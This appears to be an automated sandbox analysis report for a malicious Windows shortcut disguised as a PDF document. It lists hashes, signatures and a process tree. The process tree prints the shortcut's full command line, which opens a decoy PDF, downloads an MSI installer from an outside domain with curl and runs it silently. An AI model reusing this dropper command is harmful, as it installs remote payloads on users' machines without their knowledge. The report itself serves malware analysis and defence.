Overview

overview

10

Static

static

1

Document-0...ad.lnk

windows7-x64

3

Document-0...ad.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    120s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    31-01-2025 10:38

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Document-0191536.pdf.lnk.download.lnk

  • Size

    3KB

  • MD5

    55546c788e0e0bfc56207ee32f6c1eab

  • SHA1

    8b06c2ab87a75bdaa4962f8eeac7c094242b1e69

  • SHA256

    02c22ae33c4f792f3b30e5aa8d465bd51e408079aa6f6ace1e0c56cd03a9128e

  • SHA512

    0f51136e562b8f774ca89824c3199d97008942f16f2d2df5e4335be8467a36c7c600999d9bf5fb9c163fc2ce630d2519d54e17b1b06a8ff3fbdbf4242e21322a

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\Document-0191536.pdf.lnk.download.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2056
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k start msedge https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf & curl -sLo C:\Users\Admin\AppData\Local\Temp\3aa38576-fb5b-4f20-9f83-8aef5a184502.msi https://lnbox.info/cool/setup_x64.msi & C:\Users\Admin\AppData\Local\Temp\3aa38576-fb5b-4f20-9f83-8aef5a184502.msi /qn | Taskkill /f /im cmd.exe
      2⤵
        PID:2336

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2336-46-0x0000000002220000-0x0000000002221000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2336-54-0x0000000002220000-0x0000000002221000-memory.dmp

      Filesize

      4KB

      Download